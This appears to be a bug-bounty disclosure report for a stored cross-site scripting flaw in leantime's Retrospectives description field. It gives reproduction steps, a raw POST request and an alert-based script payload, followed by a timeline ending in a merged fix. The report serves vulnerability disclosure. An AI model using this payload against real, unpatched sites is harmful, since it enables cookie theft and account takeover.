Cross-site Scripting (XSS) - Stored in leantime/leantime

Valid

Reported on

Nov 24th 2021


Description

I found Stored XSS in the title of the content.

Proof of Concept

Step

1.First of all, build the environment with Docker and create an administrator user.

2.Next, create a new "To -DO" from "Project Dashboard" in the left menu. (/)

3.Next, create an account for the role of "Team Member" from "User Management" in the menu on the right side, and assign it to the project you created earlier. (/users/newUser/)

4.Then log in as a member user created in another secret tab.

5.Then select "Retrospectives" from the menu on the left and click Add More. (/retrospectives/showBoards)

6.Then, embed the following payload in "Description" and save it."/></script><script>alert(3)</script>

POST /retrospectives/retroDialog/ HTTP/1.1
Host: localhost
 ...
canvasId=&box=well&itemId=&description=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E%0D%0A&data=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert(10)%3C%2Fscript%3E%0D%0A&milestoneId=&changeItem=1

7.Finally, when you access "Retrospectives" as an administrator user, a pop-up screen will be displayed.

From the above, it can be confirmed that it is possible to execute Stored XSS embedded by a normal user on the administrator screen.

Summary

-Endpoint: POST /retrospectives/retroDialog/

-Parameters: description

-Test Payload: "/></script><script>alert(3)</script>

Impact

This vulnerability can steal a user's cookie.

And it may be possible to gain unauthorized access to the user's account via the stolen cookie.

We are processing your report and will contact the leantime team within 24 hours. 6 months ago
morioka12 modified the report
6 months ago
We have contacted a member of the leantime team and are waiting to hear back 6 months ago
We have sent a follow up to the leantime team. We will try again in 7 days. 6 months ago
We have sent a second follow up to the leantime team. We will try again in 10 days. 6 months ago
We have sent a third and final follow up to the leantime team. This report is now considered stale. 5 months ago
Marcel Folaron validated this vulnerability 4 months ago
morioka12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Marcel Folaron confirmed that a fix has been merged on 7cbdbf a month ago
Marcel Folaron has been awarded the fix bounty
to join this conversation